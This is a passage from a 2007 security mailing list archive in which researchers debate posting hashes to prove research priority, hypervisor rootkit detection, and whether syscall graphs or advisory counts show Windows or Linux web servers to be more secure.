up a bunch of homeless bums from the alleyway behind the pool-hall, but I suppose YMMV.... ;-) > What about a general, publically archived mailing list where > people can post hashes of results to follow up later ? Anyone who > has read the matasano blog recently (Ptacek/Rutkowska debate) would > tend to agree that we need something like this. > > If people actually follow up with the originals of their hashes a few > months (or a year) later, such a list might be hugely interesting. Even > if they just follow up with "the contents of the document with xxx are > flawed, and I withdraw the hash". It would be interesting to see the amount that got followed up and the amount that got withdrawn. > Anyhow, apologies for wasting your disk space - I will look for a better > forum in the future. Full-disclosure maybe ? It seems to be a > widely-archived write-only-medium anyhow. How about Usenet? Google groups appears to have alt.test archived all the way back to 1987! (And alt.anonymous.messages back to 1994, and that's a fairly good place to post incomprehensible strings of gibberish. No, wait a minute, pretty much the whole of alt.* is full of incomprehensible strings of gibberish....!) cheers, DaveK -- Can't think of a witty .sigline today.... From joanna at invisiblethings.org Mon Feb 5 12:51:43 2007 From: joanna at invisiblethings.org (Joanna Rutkowska) Date: Mon, 05 Feb 2007 18:51:43 +0100 Subject: [Dailydave] IPv6, CANVAS, The Love. In-Reply-To: <45C24CE8.10401@immunityinc.com> References: <45C24CE8.10401@immunityinc.com> Message-ID: <45C76EAF.8070101@invisiblethings.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dave Aitel wrote: > > A screenshot of CANVAS 6.19 attacking over IPv6 from Linux. > http://www.immunityinc.com/images/ipv6.png > So, now, when I apparently take part in the "CANVAS Advertising Campaign", shouldn't I be eligible for a free CANVAS Professional? ;) joanna. -----BEGIN PGP SIGNATURE----- iD8DBQFFx26uORdkotfEW84RAngvAJ9WU7Hpe0BLEJRT7nh3G7y7w2l8MwCgh0bd 9IzSaYh40AmiNrTmFf3IeQA= =PzEv -----END PGP SIGNATURE----- From joanna at invisiblethings.org Mon Feb 5 14:03:00 2007 From: joanna at invisiblethings.org (Joanna Rutkowska) Date: Mon, 05 Feb 2007 20:03:00 +0100 Subject: [Dailydave] IPv6, CANVAS, The Love. In-Reply-To: References: <45C24CE8.10401@immunityinc.com> <45C76EAF.8070101@invisiblethings.org> Message-ID: <45C77F64.10703@invisiblethings.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 David Maynor wrote: > Does this mean we can look forward to bluepill like shellcode being > included in CANVAS? > oh, I thought they already have it, no? but actually you will never know, cause it's 100% undetectable ;)) j. -----BEGIN PGP SIGNATURE----- iD8DBQFFx39jORdkotfEW84RAm2RAKC0jH+f4OF0l3dq69t3P6szDDqwFgCfWig9 QwVadeJQB5HA7O6PZFnndHs= =GS27 -----END PGP SIGNATURE----- From joanna at invisiblethings.org Mon Feb 5 14:44:04 2007 From: joanna at invisiblethings.org (Joanna Rutkowska) Date: Mon, 05 Feb 2007 20:44:04 +0100 Subject: [Dailydave] Some Sums In-Reply-To: <20070205152244.239350@gmx.net> References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> <20070205152244.239350@gmx.net> Message-ID: <45C78904.5060905@invisiblethings.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Halvar Flake wrote: > I admit that strictly speaking I have abused DD with the last mail. > What about a general, publically archived mailing list where > people can post hashes of results to follow up later ? Anyone who > has read the matasano blog recently (Ptacek/Rutkowska debate) would > tend to agree that we need something like this. > And what would that change, really, if I posted today a hash of our (because now, there's also Alex and Edgar working on Blue Pill) recent achievements in Blue Pill development (e.g. generic ways to resist direct timing analysis using trusted external clocks)? Ok, true, we're planning to give a presentation later this year on this subject and that would be cool if nobody else gave something similar before us, but does that mean we should "buy an insurance" today for "being the first"? Sure, it's cool to be the first person who publicly presents something. And all the press spotlight is cool too. But at some point, we can easily get into absurd I think... If somebody else gave a similar presentation before me, I could only used it as an argument to support my thesis (in this very example, that CPU vendors should provide a documented way to detect the presence of h/w hypervisors). I'm not judging Halvar, who I consider to be a great researcher, but it's almost a new trend now - Tom Ptacek published some mysterious hash in order to convince mankind that it should not be worried of hardware virtualization malware, now Halvar, who's next? And what's the real goal? To show off that "I'm better then others"? Or am I missing something? BTW, as both MD5 and SHA1 are considered broken these days, I wonder how difficult would it be to prepare some other file matching Halvar's or Tom's signatures? How about we start a little contest? I will buy a dinner to the first person (at a conference that we both attend) who creates a document matching Tom Ptacek's hash, which is here: http://www.matasano.com/log/680/detecting-virtualized-rootkits/ (the way of creating a matching file should be documented) I assume it would be easier to break Tom's hash as he only posted SHA1, while Halvar, apparently anticipating something, published both SHA1 and MD5. joanna. -----BEGIN PGP SIGNATURE----- iD8DBQFFx4kDORdkotfEW84RAjuEAKDgwvMP6yRxelMQFW01VnGp5NiRJgCg5j8F 8SnNprRjcx9XuDNROHwyQOc= =/HEp -----END PGP SIGNATURE----- From dave at immunityinc.com Tue Feb 6 19:57:07 2007 From: dave at immunityinc.com (Dave Aitel) Date: Tue, 06 Feb 2007 19:57:07 -0500 Subject: [Dailydave] Graphing: Don't believe everything you see. Message-ID: <45C923E3.4070509@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Graphs can be quite misleading. They make people think they see something which is blindingly obvious, but totally wrong. http://blogs.zdnet.com/threatchaos/?p=311 (Check out the pictures.) """ Windows is inherently harder to secure than Linux. There I said it. The simple truth. Many millions of words have been written and said on this topic. I have a couple of pictures. The basic argument goes like this. In its long evolution, Windows has grown so complicated that it is harder to secure. Well these images make the point very well. Both images are a complete map of the system calls that occur when a web server serves up a single page of html with a single picture. The same page and picture. A system call is an opportunity to address memory. A hacker investigates each memory access to see if it is vulnerable to a buffer overflow attack. The developer must do QA on each of these entry points. The more system calls, the greater potential for vulnerability, the more effort needed to create secure applications. """ As soon as I saw those pictures, I was like "Hey, Sana Security guys spend hours staring at this stuff" and lo and behold, that's where they come from. The more system calls, the harder to secure with Sana's particular flavor of HIDS. But not "the greater potential for vulnerability". You don't get to see the syscall names here, but there's a few large segments of IIS you don't get to see anywhere in Apache are as follows (I've read the source code for both, so bear with me): 1. The metabase - essentially a registry of configuration data that works on a per-directory or per-page basis. This is rather complex stuff, requiring MSRPC calls and all sorts of craziness. But it doesn't necessarily add to the insecurity of the product. 2. Threading and impersonation. My bet is that the syscall graph he generated for Apache was in forking mode. No need to thread or handle asynchronous operations at all. Just read(data); handle(data). Complexity only correlates with insecurity; it doesn't let you make order-of-magnitude judgment calls. Especially not based on graphs like that. For the record, or at least, as a reminder to the record, anything based solely on system call ordering is going to have a bugger of a time dealing with CreateThread(). On Windows you might be better off ignoring system call ordering entirely and dealing only with system call arguments. Having more system calls might make the entropy of the arguments of any one system call much smaller (ioctl() has very high argument entropy). Based on that, Windows might actually be MORE secure, just looked at from a different angle than the call graph he chooses to represent. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFySPitehAhL0gheoRAsRAAJ9gqIk9Hpt4AUYtsJ1WBopQnwfa+wCeM6Sm c/glQW/8rrtaeWlc9Nef3Xw= =qtzO -----END PGP SIGNATURE----- From felix-dailydave at fefe.de Tue Feb 6 21:58:54 2007 From: felix-dailydave at fefe.de (Felix von Leitner) Date: Wed, 7 Feb 2007 03:58:54 +0100 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <45C923E3.4070509@immunityinc.com> References: <45C923E3.4070509@immunityinc.com> Message-ID: <20070207025853.GA21338@codeblau.de> Thus spake Dave Aitel (dave at immunityinc.com): > Complexity only correlates with insecurity; it doesn't let you make > order-of-magnitude judgment calls. Especially not based on graphs like > that. Actually, an asynchronous webserver needs these syscalls to handle the two requests: GetQueuedCompletionStatus returns [socket+AcceptEx+CreateIoCompletionPort to queue the next request] CreateFile on the file to be served GetFileSize et al to get header data (optional) TransmitFile to send the response CloseFile to close the file ReadFile to read the second request GetQueuedCompletionStatus returns again CreateFile on the file to be served GetFileSize et al to get header data (optional) TransmitFile to send the response CloseFile to close the file closesocket That's it. No, really. Sprinkle in some VirtualAlloc and friends for malloc and free, but that's it. So if you see a graph in fine print about how a couple hundred syscalls are being called by a web server, that's a pretty good indicator that there's something wrong with it. Keep things simple. That said: this particular troll is from mid-2006 and has been on Slashdot back then, too. There is no reason to get worked up about it now. Felix PS: Apache is a bloated pig. People use it because so many other people are using it, not because there are any actual rational reasons to use it. IIS is a pig, too. People use it because it comes with Windows, and because it cheats (so it's faster than a pure user space web server can be). From druid at caughq.org Tue Feb 6 23:31:35 2007 From: druid at caughq.org (I)ruid) Date: Tue, 06 Feb 2007 22:31:35 -0600 Subject: [Dailydave] Not the dead "Vista speach recognition" thread (: In-Reply-To: <20070131155623.4235F1BF94B@absinthe.tinho.net> References: <20070131155623.4235F1BF94B@absinthe.tinho.net> Message-ID: <1170822695.20989.1.camel@localhost> On Wed, 2007-01-31 at 10:56 -0500, dan at geer.org wrote: > Next up: application to VoIP Almost right on cue, Skype begins promoting a 3rd party plug-in from Emotive Communications that provides a near-perfect attack vector: http://www.ringjacker.com/ It causes the called party to be "ringed" with caller-supplied ring-tone audio. More coverage here: http://voipsa.org/blog/2007/02/05/and-why-exactly-would-i-want-to-install-ringjacker-and-let-other-people-hijack-my-inbound-ringtone/ -- I)ruid, C?ISSP druid at caughq.org http://druid.caughq.org -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20070206/f85ab990/attachment-0001.pgp From george_ou at lanarchitect.net Wed Feb 7 01:27:38 2007 From: george_ou at lanarchitect.net (George Ou) Date: Tue, 6 Feb 2007 22:27:38 -0800 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <45C923E3.4070509@immunityinc.com> References: <45C923E3.4070509@immunityinc.com> Message-ID: <005401c74a81$111d2db0$0c01a8c0@ecs400a> Ok this is really stupid. Why is it that Apache has so many more critical flaws than IIS 6.0 then? IIS 6.0 http://secunia.com/product/1438/?task=advisories Apache 2.0 http://secunia.com/product/73/?task=advisories Note that a lot of those Apache advisories are MULTIPLE exploits. Also note that Windows Server 2003 has had a fairly solid track record on security when you count the number of critical exploits over its lifetime compared to Linux. Take a look at Microsoft SQL 2005 and you'll see that's been ROCK SOLID with ZERO vulnerabilities. http://secunia.com/product/6782/?task=advisories Compare that to the mess of Oracle over the same time period. So let's not base our analysis on some stupid trumped up diagram and let's not make stupid generalizations about platforms. Let's try and be objective and factual. There are times one can bash Microsoft but this so called picture "analysis" just isn't one of them. George Ou -----Original Message----- From: dailydave-bounces at lists.immunitysec.com [mailto:dailydave-bounces at lists.immunitysec.com] On Behalf Of Dave Aitel Sent: Tuesday, February 06, 2007 4:57 PM To: dailydave at lists.immunitysec.com Subject: [Dailydave] Graphing: Don't believe everything you see. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Graphs can be quite misleading. They make people think they see something which is blindingly obvious, but totally wrong. http://blogs.zdnet.com/threatchaos/?p=311 (Check out the pictures.) """ Windows is inherently harder to secure than Linux. There I said it. The simple truth. Many millions of words have been written and said on this topic. I have a couple of pictures. The basic argument goes like this. In its long evolution, Windows has grown so complicated that it is harder to secure. Well these images make the point very well. Both images are a complete map of the system calls that occur when a web server serves up a single page of html with a single picture. The same page and picture. A system call is an opportunity to address memory. A hacker investigates each memory access to see if it is vulnerable to a buffer overflow attack. The developer must do QA on each of these entry points. The more system calls, the greater potential for vulnerability, the more effort needed to create secure applications. """ As soon as I saw those pictures, I was like "Hey, Sana Security guys spend hours staring at this stuff" and lo and behold, that's where they come from. The more system calls, the harder to secure with Sana's particular flavor of HIDS. But not "the greater potential for vulnerability". You don't get to see the syscall names here, but there's a few large segments of IIS you don't get to see anywhere in Apache are as follows (I've read the source code for both, so bear with me): 1. The metabase - essentially a registry of configuration data that works on a per-directory or per-page basis. This is rather complex stuff, requiring MSRPC calls and all sorts of craziness. But it doesn't necessarily add to the insecurity of the product. 2. Threading and impersonation. My bet is that the syscall graph he generated for Apache was in forking mode. No need to thread or handle asynchronous operations at all. Just read(data); handle(data). Complexity only correlates with insecurity; it doesn't let you make order-of-magnitude judgment calls. Especially not based on graphs like that. For the record, or at least, as a reminder to the record, anything based solely on system call ordering is going to have a bugger of a time dealing with CreateThread(). On Windows you might be better off ignoring system call ordering entirely and dealing only with system call arguments. Having more system calls might make the entropy of the arguments of any one system call much smaller (ioctl() has very high argument entropy). Based on that, Windows might actually be MORE secure, just looked at from a different angle than the call graph he chooses to represent. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFySPitehAhL0gheoRAsRAAJ9gqIk9Hpt4AUYtsJ1WBopQnwfa+wCeM6Sm c/glQW/8rrtaeWlc9Nef3Xw= =qtzO -----END PGP SIGNATURE----- _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave From coley at mitre.org Wed Feb 7 02:11:16 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 7 Feb 2007 02:11:16 -0500 (EST) Subject: [Dailydave] Some Sums Message-ID: <200702070711.l177BGJw026300@faron.mitre.org> > I take it that's going to be the hash of some file or other data > you're > going to produce for someone at sometime in the future? > Couldn't you just > have used a ZK protocol and left us all out of > it? ;-) If you're going to use > our inboxes as substitutes for > escrow/notarisation centres, you could perhaps > tell us just a > little bit more about what you're doing! MD5/SHA-1 crackability issues aside*, the next question that immediately comes to mind is why there isn't a central place for researchers to do exactly this - make a claim about knowledge that's provably fixed in a certain place and time. Oh, wait, we're all individuals and we don't need anybody else. There's no need to organize in any way, shape, or form. After all, when Ilfak posted that third-party patch, ABSOLUTELY EVERYBODY knew who he was and immediately trusted him, so why not Halvar? Sorry, I forgot about the outside world for a second. Snarkily and respectfully, Steve * crypto is my kryptonite, I defer to the geniuses. From dan at geer.org Wed Feb 7 02:35:38 2007 From: dan at geer.org (dan at geer.org) Date: Wed, 07 Feb 2007 02:35:38 -0500 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: Your message of "Wed, 07 Feb 2007 03:58:54 +0100." <20070207025853.GA21338@codeblau.de> Message-ID: <20070207073538.946E71BF9DA@absinthe.tinho.net> If anyone wants to argue about whether complexity and security are negatively correlated, then let's get to it. --dan, resisting burning bandwidth unasked From tqbf at matasano.com Wed Feb 7 08:54:10 2007 From: tqbf at matasano.com (Thomas Ptacek) Date: Wed, 7 Feb 2007 07:54:10 -0600 Subject: [Dailydave] Some Sums In-Reply-To: <45C78904.5060905@invisiblethings.org> References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> <20070205152244.239350@gmx.net> <45C78904.5060905@invisiblethings.org> Message-ID: <1df0a410702070554h54aa171bldb9c79b76a5d6353@mail.gmail.com> For those playing along with Joanna at home, use: d86ded8e6f086cbc86bb07d854e58e1d60680958 Which is SHA-1, untruncated, of the same file and a different nonce. The point of posting the hash is so that I can say we did something ("devised a battery of checks that detect hardware virtualization") and not have people think we simply made it up. On 2/5/07, Joanna Rutkowska wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Halvar Flake wrote: > > I admit that strictly speaking I have abused DD with the last mail. > > What about a general, publically archived mailing list where > > people can post hashes of results to follow up later ? Anyone who > > has read the matasano blog recently (Ptacek/Rutkowska debate) would > > tend to agree that we need something like this. > > > > And what would that change, really, if I posted today a hash of our > (because now, there's also Alex and Edgar working on Blue Pill) recent > achievements in Blue Pill development (e.g. generic ways to resist > direct timing analysis using trusted external clocks)? > > Ok, true, we're planning to give a presentation later this year on this > subject and that would be cool if nobody else gave something similar > before us, but does that mean we should "buy an insurance" today for > "being the first"? > > Sure, it's cool to be the first person who publicly presents something. > And all the press spotlight is cool too. But at some point, we can > easily get into absurd I think... > > If somebody else gave a similar presentation before me, I could only > used it as an argument to support my thesis (in this very example, that > CPU vendors should provide a documented way to detect the presence of > h/w hypervisors). > > I'm not judging Halvar, who I consider to be a great researcher, but > it's almost a new trend now - Tom Ptacek published some mysterious hash > in order to convince mankind that it should not be worried of hardware > virtualization malware, now Halvar, who's next? And what's the real > goal? To show off that "I'm better then others"? Or am I missing something? > > BTW, as both MD5 and SHA1 are considered broken these days, I wonder how > difficult would it be to prepare some other file matching Halvar's or > Tom's signatures? How about we start a little contest? I will buy a > dinner to the first person (at a conference that we both attend) who > creates a document matching Tom Ptacek's hash, which is here: > > http://www.matasano.com/log/680/detecting-virtualized-rootkits/ > > (the way of creating a matching file should be documented) > > I assume it would be easier to break Tom's hash as he only posted SHA1, > while Halvar, apparently anticipating something, published both SHA1 and > MD5. > > joanna. > -----BEGIN PGP SIGNATURE----- > > iD8DBQFFx4kDORdkotfEW84RAjuEAKDgwvMP6yRxelMQFW01VnGp5NiRJgCg5j8F > 8SnNprRjcx9XuDNROHwyQOc= > =/HEp > -----END PGP SIGNATURE----- > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From robert at dyadsecurity.com Wed Feb 7 11:05:46 2007 From: robert at dyadsecurity.com (Robert E. Lee) Date: Wed, 07 Feb 2007 17:05:46 +0100 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <005401c74a81$111d2db0$0c01a8c0@ecs400a> References: <45C923E3.4070509@immunityinc.com> <005401c74a81$111d2db0$0c01a8c0@ecs400a> Message-ID: <45C9F8DA.4010808@dyadsecurity.com> George Ou wrote: > Take a look at Microsoft SQL 2005 and you'll see that's been ROCK SOLID with > ZERO vulnerabilities. > http://secunia.com/product/6782/?task=advisories > Compare that to the mess of Oracle over the same time period. > > So let's not base our analysis on some stupid trumped up diagram and let's > not make stupid generalizations about platforms. Let's try and be objective > and factual. In the spirit of "[silly] generalizations".... the number of vulnerabilities publicly disclosed for a product doesn't seem to be a valid metric for measuring security between products. There are different disclosure policies for every organization/product. Some applications are just going to get more attention than others. Closed source vs Open Source changes the methods available to an outside researcher for testing. For results to be compared, the same tests have to be run equally for both projects. Comparing the end result (vulnerability count) without taking into account how we got to the end result (testing methodology) reminds me a bit of: "If... she... weighs... the same as a duck,... she's made of wood. And therefore? A witch!!!" Cheers :), Robert -- Robert E. Lee Chief Information Officer http://www.dyadsecurity.com phone: +46-708-474-320 fax : +46-0455-13960 email: robert at dyadsecurity.com From dave at immunityinc.com Wed Feb 7 11:40:02 2007 From: dave at immunityinc.com (Dave Aitel) Date: Wed, 07 Feb 2007 11:40:02 -0500 Subject: [Dailydave] SILICA, hashes, etc Message-ID: <45CA00E2.30804@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 http://blogs.zdnet.com/security/?p=19 Check out the awesome pictures of Justine using Silica! It's like, hacking in action! I've been playing with mine a bit. There's just so many things you can do with something like this - it could really have 30 people developing stuff just for it. You end up dealing with a lot of interesting equipment. I've seen some truly weird CIFS servers, for example. One of our early adopters has a CISCO Leap network and I remember reading of a simple algorithmic crack for the authentication....has anyone tested it? Now I'm off to fix the reporting which I broke. :> - -dave This place after your signature is a good place for hashes. I'm not going to post any since it gives people a way to track the amount and timing of your research. But if you do like, less than 5 hashes a message, I don't see how anyone will care. And DD is archived on like 5 sites. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFygDftehAhL0gheoRAsmHAJ9yXjm9a4Qsrr8wbxdtr7ZaPSlxSwCcCL9U BgedMqtp/4EQbBdq45EJmjQ= =hKUx -----END PGP SIGNATURE----- From lmh at info-pull.com Wed Feb 7 13:15:39 2007 From: lmh at info-pull.com (LMH) Date: Wed, 7 Feb 2007 19:15:39 +0100 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <005401c74a81$111d2db0$0c01a8c0@ecs400a> References: <45C923E3.4070509@immunityinc.com> <005401c74a81$111d2db0$0c01a8c0@ecs400a> Message-ID: On 2/7/07, George Ou wrote: > Ok this is really stupid. Why is it that Apache has so many more critical > flaws than IIS 6.0 then? > > IIS 6.0 > http://secunia.com/product/1438/?task=advisories > > Apache 2.0 > http://secunia.com/product/73/?task=advisories > > Note that a lot of those Apache advisories are MULTIPLE exploits. http://secunia.com/product/4661/ lighttpd "just" has 3 known "advisories" released there. And well, running lighttpd on a production system and being concerned about security is pretty much like walking nude in a donkey farm, fully covered with pheromones. Any 'study' done upon known statistics is already a flawed assumption as a whole. Not that I'm doing propaganda for Apache. Given that nowadays people pretend to publicize mod_security and friends for improving the security of their 'web applications' the situation isn't really nice, for them. Cheers. From adam at homeport.org Wed Feb 7 13:39:26 2007 From: adam at homeport.org (Adam Shostack) Date: Wed, 7 Feb 2007 13:39:26 -0500 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <20070207073538.946E71BF9DA@absinthe.tinho.net> References: <20070207025853.GA21338@codeblau.de> <20070207073538.946E71BF9DA@absinthe.tinho.net> Message-ID: <20070207183926.GA31790@homeport.org> Speaking for myself, I think there are much more interesting questions than looking at correlations between defects and complexity. For example, we could look at correlations between failures in the real world and training/education. The breach notices that Attrition is accumulating (http://attrition.org/dataloss) give us a set of real wolrd failure data. That's something we've never really had. Now we can start mining it and learning things. For example, does the number of CISSPs employed by an organization correlate with the reports of failures compared to other similar orgs? Is that correlation positive or negative? Does "user education" have an effect? There's a huge amount of data in the attrition data set, and it all involves real pain that real organizations are feeling as they try to secure their data. It's worth studying. Adam On Wed, Feb 07, 2007 at 02:35:38AM -0500, dan at geer.org wrote: | | If anyone wants to argue about whether complexity | and security are negatively correlated, then let's | get to it. | | --dan, resisting burning bandwidth unasked | | _______________________________________________ | Dailydave mailing list | Dailydave at lists.immunitysec.com | http://lists.immunitysec.com/mailman/listinfo/dailydave From jf at danglingpointers.net Wed Feb 7 22:03:05 2007 From: jf at danglingpointers.net (jf) Date: Thu, 8 Feb 2007 03:03:05 +0000 (UTC) Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <45C9F8DA.4010808@dyadsecurity.com> References: <45C923E3.4070509@immunityinc.com> <005401c74a81$111d2db0$0c01a8c0@ecs400a> <45C9F8DA.4010808@dyadsecurity.com> Message-ID: Really, almost all of these metrics are flawed- of the critical vulnerabilities listed many of them are things like critical bug in OpenSSL, problems in ftp proxy with IPv66 sockets, et cetera; which I guess depending on who you are, may or may not be critical, but to most of us who aren't using any type of proxy or IPv66 sockets, it's not so important. This is important to take into account when reviewing those number of critical bugs comparisons. If we compare MS Office to OpenOffice in this light, it would show that OO is greatly superior in security to MS Office because of the number of critical flaws found, but I'd be willing to bet that many of us may not necessarily agree with that conjecture. The number of reported bugs are just that, and shouldn't be used as a metric to determine if a product is secure or not. (however, when a bug is reported and then some time in the distant future another similar bug affecting the same region of code does indicate a failure on the vendors part to really care at all, which IMHO is a much better metric) Then we have things like 'time to patch' metrics, which are also flawed, for instance does MS release patches for third-party products, or rather if there is (yet another) bug in a CA product and MS doesn't patch it, do we count that against them? Why do we do that for Redhat? Maybe that isn't the best point as Redhat did indeed ship with a product, but where does responsibility lie? What if the bug is on the 'extras' CD in an unstable directory, do we count that? How about if it took organization Y several weeks to produce a patch for their product and then in less than Z hours the OS vendor provides the patch to their customers, do we count the time as 'several weeks' or Z hours? That all said, because of different models, comparing time to patch for Windows to Linux/BSD/any of the OSs that comprise of mostly third party applications provides a false view of the situation. As for the graphs, they provide an idea of the potential amount of bugs, but provide no real firm data. Speaking in a sense of probability of course. To declare however that one product is more secure than another simply based off of a graph like that is absurd and silly, and I think everyone realizes this. -- Success is not final, failure is not fatal: it is the courage to continue that counts. -- Sir Winston Churchill On Wed, 7 Feb 2007, Robert E. Lee wrote: > Date: Wed, 07 Feb 2007 17:05:46 +0100 > From: Robert E. Lee > To: dailydave at lists.immunitysec.com > Subject: Re: [Dailydave] Graphing: Don't believe everything you see. > > George Ou wrote: > > Take a look at Microsoft SQL 2005 and you'll see that's been ROCK > SOLID with > > ZERO vulnerabilities. > > http://secunia.com/product/6782/?task=advisories > > Compare that to the mess of Oracle over the same time period. > > > > So let's not base our analysis on some stupid trumped up diagram and > let's > > not make stupid generalizations about platforms. Let's try and be > objective > > and factual. > > In the spirit of "[silly] generalizations".... the number of > vulnerabilities publicly disclosed for a product doesn't seem to be a > valid metric for measuring security between products. There are different > disclosure policies for every organization/product. Some applications > are just going to get more attention than others. > > Closed source vs Open Source changes the methods available to an outside > researcher for testing. For results to be compared, the same tests have > to be run > equally for both projects. > > Comparing the end result (vulnerability count) without taking into account > how we got to the end result (testing methodology) reminds me a bit of: > > "If... she... weighs... the same as a duck,... she's made of wood. And > therefore? A witch!!!" > > Cheers :), > > Robert > > From dominique.brezinski at gmail.com Wed Feb 7 15:45:06 2007 From: dominique.brezinski at gmail.com (Dominique Brezinski) Date: Wed, 7 Feb 2007 12:45:06 -0800 Subject: [Dailydave] Some Sums In-Reply-To: <1df0a410702070554h54aa171bldb9c79b76a5d6353@mail.gmail.com> References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> <20070205152244.239350@gmx.net> <45C78904.5060905@invisiblethings.org> <1df0a410702070554h54aa171bldb9c79b76a5d6353@mail.gmail.com> Message-ID: <597760c90702071245u1b406f08q20f3c70cd08c732@mail.gmail.com> On 2/7/07, Thomas Ptacek wrote: > For those playing along with Joanna at home, use: > > d86ded8e6f086cbc86bb07d854e58e1d60680958 > > Which is SHA-1, untruncated, of the same file and a different nonce. > > The point of posting the hash is so that I can say we did something > ("devised a battery of checks that detect hardware virtualization") > and not have people think we simply made it up. Tom and Halvar, why not go the extra step and sign the message? If you truly want a public record of first reference, it would seem a necessary step. Dominique Brezinski From cseagle at redshift.com Wed Feb 7 17:30:48 2007 From: cseagle at redshift.com (Chris Eagle) Date: Wed, 7 Feb 2007 14:30:48 -0800 Subject: [Dailydave] Some Sums In-Reply-To: <597760c90702071245u1b406f08q20f3c70cd08c732@mail.gmail.com> References: <20070205131130.292040@gmx.net><028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM><20070205152244.239350@gmx.net> <45C78904.5060905@invisiblethings.org><1df0a410702070554h54aa171bldb9c79b76a5d6353@mail.gmail.com> <597760c90702071245u1b406f08q20f3c70cd08c732@mail.gmail.com> Message-ID: <00a601c74b07$adfc8410$620510ac@ribeye> -----BEGIN PGP SIGNED MESSAGE----- ######################################################## # # This is a proof of posting certificate from # stamper.itconsult.co.uk certifying that a user # claiming to be:- # cseagle at redshift.com # requested that this message be sent to:- # dailydave at lists.immunitysec.com # # This certificate was issued at 22:34 (GMT) # on Wednesday 07 February 2007 with reference 0402578 # # CAUTION: while the message may well be from the sender # indicated in the "From:" header, the sender # has NOT been authenticated by this service # # For information about the Stamper service see # http://www.itconsult.co.uk/stamper.htm # ######################################################## Or people could choose to use a third party digital signing/timestamping service such as that offered above in order to submit hashes real or otherwise such as my quota of 5 below. Chris 8b8851175db3f75f6cca226a71bc983ef507a1e8 421013a7981118f42837ab64546d6ba1fcd21d44 f80b4a15a0b3d6d3930c465bebd010bd99cb1f6a b47a007951fd9ba8a494d84e09047a56f46ec844 bca6dc17e0373d5464bd1cc706d3156fb40ce7f2 Dominique Brezinski wrote: >Tom and Halvar, why not go the extra step and sign the message? If you truly >want a public record of first reference, it would seem a necessary step. -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv Comment: Stamper Reference Id: 0402578 iQEVAgUBRcpT5oGVnbVwth+BAQFZpQf+KLAJryiHDSMXEI4LrDPC1Oe3Sr9zCUnf vlNfuogTWSvmFhPpyNLQNpBeoKypj3gMEN1ZSJPC+Rwv5Fv9zG7nb9VYQvXffCyE DcGX8qURsDNmuarH5c73tRcQrR1vW94ZiR8ve3urvPlt9Z+wVkxadYkSHqkQS2Z+ fVxV9uZcq6Mc3isy0Xw0AVFa0qOQXuOlNkLSQdhLFt/Ai+B3HaC4mxF5Ryu7uwyS UPV7oqhqdtvoXMlAeKGR5MK80POA2yGIg5TVo4sFaBc+j7wUK7AtPa5pUZij2Y/L 9tMoM5a3x5GQJ9FKZqMJ27gnlx6tLBWT5NwwJ4nEjYvTqtf2/kSuaA== =K/qY -----END PGP SIGNATURE----- From cvoid at morphine.com Wed Feb 7 17:38:23 2007 From: cvoid at morphine.com (christian void) Date: Wed, 7 Feb 2007 14:38:23 -0800 (PST) Subject: [Dailydave] Some Sums In-Reply-To: <597760c90702071245u1b406f08q20f3c70cd08c732@mail.gmail.com> References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> <20070205152244.239350@gmx.net> <45C78904.5060905@invisiblethings.org> <1df0a410702070554h54aa171bldb9c79b76a5d6353@mail.gmail.com> <597760c90702071245u1b406f08q20f3c70cd08c732@mail.gmail.com> Message-ID: <20070207143518.V68521@spam.musubi.org> On Wed, 7 Feb 2007, Dominique Brezinski wrote: > Tom and Halvar, why not go the extra step and sign the message? If you > truly want a public record of first reference, it would seem a > necessary step. this thread has had me thinking over the last few days of building a distributed system to maintain lists of hashes. signed to prove provenance, distributed (and publicly readable) to keep the information available in many locations ala usenet or mailing lists. if more people than just myself think this would be useful, we can build it. :) -- christian void cvoid at morphine.com http://www.morphine.com/void/ From ari.takanen at codenomicon.com Thu Feb 8 00:18:27 2007 From: ari.takanen at codenomicon.com (Ari Takanen) Date: Thu, 8 Feb 2007 07:18:27 +0200 Subject: [Dailydave] Some Sums In-Reply-To: References: Message-ID: <20070208051827.GC31087@codenomicon.com> Hmmm, distantly related to this: Maybe us fuzzer developers should save hashes of some millions of attacks somewhere also, so that we can prove our tools were used to find the flaws in the first place... Looking at past iDefence disclosures for example, I am beginning to doubt that they reward for publishing flaws instead of finding flaws (this is like patent system in Europe which rewards first to file, not first to invent)... More and more flaws are found using tools, and pre-packaged attacks. 